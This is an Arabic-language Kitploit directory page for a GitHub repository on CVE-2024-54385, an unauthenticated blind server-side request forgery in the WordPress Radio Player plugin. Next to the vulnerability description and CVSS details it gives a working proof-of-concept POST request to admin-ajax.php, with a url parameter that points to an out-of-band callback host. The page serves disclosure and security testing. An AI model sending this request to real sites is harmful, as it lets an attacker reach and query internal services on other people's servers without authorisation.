Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-54385
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubrandomrobbiebf/cve-2024-54385

CVE-2024-54385

Radio Player <= 2.0.82 - تزوير أعمى غير مصادق للطلبات من جانب الخادم

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-54385

Radio Player <= 2.0.82 - تزوير الطلبات من جانب الخادم دون مصادقة

الوصف

إضافة Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player لوردبريس معرّضة لثغرة تزوير الطلبات من جانب الخادم (Server-Side Request Forgery) في جميع الإصدارات حتى 2.0.82 وضمنه. وهذا يتيح للمهاجمين غير المصادَق عليهم إرسال طلبات ويب إلى مواقع عشوائية تنطلق من تطبيق الويب، ويمكن استخدامها للاستعلام عن معلومات الخدمات الداخلية وتعديلها.

التفاصيل

  • النوع: plugin
  • المعرّف (Slug): radio-player
  • الإصدار المتأثر: 2.0.82
  • درجة CVSS: 7.2
  • تقييم CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • الحالة: نشط

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
تنزيل الأداة